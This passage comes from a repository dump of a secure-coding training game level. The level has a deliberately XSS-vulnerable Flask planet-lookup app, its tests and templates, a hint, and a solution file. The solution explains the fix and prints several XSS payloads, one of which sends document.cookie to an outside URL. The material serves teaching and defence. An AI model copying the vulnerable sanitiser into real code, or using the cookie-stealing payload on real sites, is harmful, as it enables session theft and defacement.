';
47 |
48 | request(app)
49 | .post('/ufo')
50 | .set('Content-Type', 'application/xml')
51 | .send(invalidXmlPayload)
52 | .expect(400)
53 | .end((err, res) => {
54 | if (err) return done(err + "\n" + res.text);
55 | expect(res.text).to.include('Invalid XML');
56 | done();
57 | });
58 | });
59 |
60 | it('should respond with a 400 error for unsupported content type', (done) => {
61 | request(app)
62 | .post('/ufo')
63 | .set('Content-Type', 'application/octet-stream')
64 | .send('Some data')
65 | .expect(405, done);
66 | });
67 | });
68 |
69 | after(() => {
70 | app.close();
71 | });
--------------------------------------------------------------------------------
/Season-2/Level-4/code.py:
--------------------------------------------------------------------------------
1 | # Welcome to Secure Code Game Season-2/Level-4!
2 |
3 | # Follow the instructions below to get started:
4 |
5 | # 1. tests.py file is passing but code.py is vulnerable
6 | # 2. Review the code in this file. Can you spot the bugs(s)?
7 | # 3. Fix the bug(s) in code.py. Ensure that tests.py passes
8 | # 4. Run hack.py and if passing then CONGRATS!
9 | # 5. If stuck then read the hint
10 | # 6. Compare your solution with solution.txt
11 |
12 | # Run code.py (RECOMMENDED for this level) by following the instructions below:
13 |
14 | # Run by opening a terminal and running the following:
15 | # $ export FLASK_APP=Season-2/Level-4/code.py && export FLASK_ENV=development && export FLASK_DEBUG=0 && flask run
16 |
17 | import os
18 | import re
19 | from flask import Flask, request, render_template
20 | app = Flask(__name__)
21 |
22 | # Set the absolute path to the template directory
23 | template_dir = os.path.abspath('Season-2/Level-4/templates')
24 | app.template_folder = template_dir
25 |
26 | # Hard-coded planet data
27 | planet_data = {
28 | "Mercury": "The smallest and fastest planet in the Solar System.",
29 | "Venus": "The second planet from the Sun and the hottest planet.",
30 | "Earth": "Our home planet and the only known celestial body to support life.",
31 | "Mars": "The fourth planet from the Sun and often called the 'Red Planet'.",
32 | "Jupiter": "The largest planet in the Solar System and known for its great red spot.",
33 | }
34 |
35 | @app.route('/', methods=['GET', 'POST'])
36 | def index():
37 | if request.method == 'POST':
38 | planet = request.form.get('planet')
39 | sanitized_planet = re.sub(r'[<>{}[\]]', '', planet if planet else '')
40 |
41 | if sanitized_planet:
42 | if 'script' in sanitized_planet.lower() :
43 | return 'Blocked
'
44 |
45 | return render_template('details.html',
46 | planet=sanitized_planet,
47 | info=get_planet_info(sanitized_planet))
48 | else:
49 | return 'Please enter a planet name.
'
50 |
51 | return render_template('index.html')
52 |
53 | def get_planet_info(planet):
54 | return planet_data.get(planet, 'Unknown planet.')
55 |
56 | if __name__ == '__main__':
57 | app.run()
--------------------------------------------------------------------------------
/Season-2/Level-4/hack.txt:
--------------------------------------------------------------------------------
1 | Simulate an attack by following these steps:
2 |
3 | 1. Start the application as instructed in 'code.py'
4 | 2. Enter the following in the planet input field:
5 | <img src='x' onerror='alert(1)'>
6 |
7 | The application should return a message stating that such a
8 | planet is unknown to the system, without showing an alert box
--------------------------------------------------------------------------------
/Season-2/Level-4/hint.txt:
--------------------------------------------------------------------------------
1 | How does the site handle user input before and after displaying it?
--------------------------------------------------------------------------------
/Season-2/Level-4/solution.txt:
--------------------------------------------------------------------------------
1 | # Contribute new levels to the game in 3 simple steps!
2 | # Read our Contribution Guideline at github.com/skills/secure-code-game/blob/main/CONTRIBUTING.md
3 |
4 | This code is vulnerable to Cross-Site Scripting (XSS).
5 |
6 | Learn more about Cross-Site Scripting (XSS): https://portswigger.net/web-security/cross-site-scripting
7 | Example from a security advisory: https://securitylab.github.com/advisories/GHSL-2023-084_Pay/
8 |
9 | Why the application is vulnerable to XSS?
10 | It seems that the user input is properly sanitized, as shown below:
11 |
12 | planet = request.form.get('planet')
13 | sanitized_planet = re.sub(r'[<>{}[\]]', '', planet if planet else '')
14 |
15 | What if all HTML's start and end tags were pruned away, what could go wrong in that case?
16 | Furthermore, an anti-XSS defense is implemented, preventing inputs with the 'script' tag.
17 | However, other tags, such as the 'img' tag, can still be used to exploit a XSS bug as follows:
18 |
19 | Exploit:
20 | <img src="x" onerror="alert(1)">
21 |
22 | Explanation:
23 | With this payload, the XSS attack will execute successfully, since it will force the browser to open an
24 | alert dialog box. There are several reasons why this is possible, as explained below:
25 |
26 | 1) The regular expression (RegEx) doesn't cover for the () characters and these are necessary for function
27 | invocation in JavaScript.
28 | 2) The sanitization doesn't touch the < and > special entities.
29 | 3) The 'display.html' is showing the planet name with the 'safe' option. This is always a risky decision.
30 | 4) The 'display.html' is reusing an unprotected planet name and rendering it at another location as HTML.
31 |
32 | How can we fix this?
33 |
34 | 1) Never reuse a content rendered in 'safe' regime as HTML. It's unescaped.
35 | 2) Don't reinvent the wheel by coming up with your own escaping facility.
36 | You can use the function 'escape', which is a built-in function inside the markup module used by Flask.
37 | This function helps to escape special characters in the input, preventing them from being executed
38 | as HTML or JavaScript.
39 |
40 | Example:
41 | from markupsafe import escape
42 |
43 | sanitized_planet = escape(planet)
44 |
45 | What else can XSS do?
46 | - Steal cookies and session information
47 | - Redirect to malicious websites
48 | - Modify website content
49 | - Phishing
50 | - Keylogging
51 |
52 | How to prevent XSS?
53 | - Sanitize user input properly
54 | - Use Content Security Policy (CSP)
55 | - Use HttpOnly Cookies
56 | - Use X-XSS-Protection header
57 |
58 | Here are some exploit examples:
59 |
60 | - Redirect to phishing page using XSS:
61 | <img src="x" onerror="window.location.href = 'https://google.com';">
62 |
63 | - Get cookies:
64 | <img src="x" onerror="window.location.href = 'https://google.com/?cookie=' + document.cookie;">
65 |
66 | - Modify website content:
67 | You can inject any phishing page, malicious page, or any other content to the website using XSS, by:
68 | <img src="x" onerror="document.body.innerHTML = 'Website is hacked';">
--------------------------------------------------------------------------------
/Season-2/Level-4/templates/details.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Planet Details
6 |
18 |
19 |
20 |
21 | Planet Details
22 | Planet name: {{ planet | safe }}
23 | Planet info: {{ info | safe }}
24 |
25 | Search in Google for more information about the planet:
26 |
29 |
30 |
31 |
--------------------------------------------------------------------------------
/Season-2/Level-4/templates/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Planet Information
6 |
51 |
52 |
53 |
54 | Planet Information
55 |
61 |
62 |
63 |
--------------------------------------------------------------------------------
/Season-2/Level-4/tests.py:
--------------------------------------------------------------------------------
1 | # Run tests.py by following the instructions below:
2 |
3 | # This file contains passing tests.
4 |
5 | # Run them by opening a terminal and running the following:
6 | # $ python3 Season-2/Level-4/tests.py
7 |
8 | # Note: first you have to run code.py following the instructions
9 | # on top of that file so that the environment variables align but
10 | # it's not necessary to run both files in parallel as the tests
11 | # initialize a new environment, similar to code.py
12 |
13 | from code import app, get_planet_info
14 | import unittest
15 | from flask_testing import TestCase
16 |
17 | class MyTestCase(TestCase):
18 | def create_app(self):
19 | app.config['TESTING'] = True
20 | app.config['TEMPLATES_AUTO_RELOAD'] = True
21 | return app
22 |
23 | def test_index_route(self):
24 | response = self.client.get('/')
25 | self.assert200(response)
26 | self.assertTemplateUsed('index.html')
27 |
28 | def test_get_planet_info_invalid_planet(self):
29 | planet = 'Pluto'
30 | expected_info = 'Unknown planet.'
31 | result = get_planet_info(planet)
32 | self.assertEqual(result, expected_info)
33 |
34 | def test_get_planet_info_valid_planet(self):
35 | planet = 'Mercury'
36 | expected_info = 'The smallest and fastest planet in the Solar System.'
37 | result = get_planet_info(planet)
38 | self.assertEqual(result, expected_info)
39 |
40 | def test_index_valid_planet(self):
41 | planet = 'Venus'
42 | response = self.client.post('/', data={'planet': planet})
43 | self.assert200(response)
44 | self.assertEqual(response.data.decode()[:15], '')
45 |
46 | def test_index_missing_planet(self):
47 | response = self.client.post('/')
48 | self.assert200(response)
49 | self.assertEqual(response.data.decode(), 'Please enter a planet name.
')
50 |
51 | def test_index_empty_planet(self):
52 | response = self.client.post('/', data={'planet': ''})
53 | self.assert200(response)
54 | self.assertEqual(response.data.decode(), 'Please enter a planet name.
')
55 |
56 | def test_index_active_content_planet(self):
57 | planet = "
56 |
57 |
58 |
59 |
125 |
126 |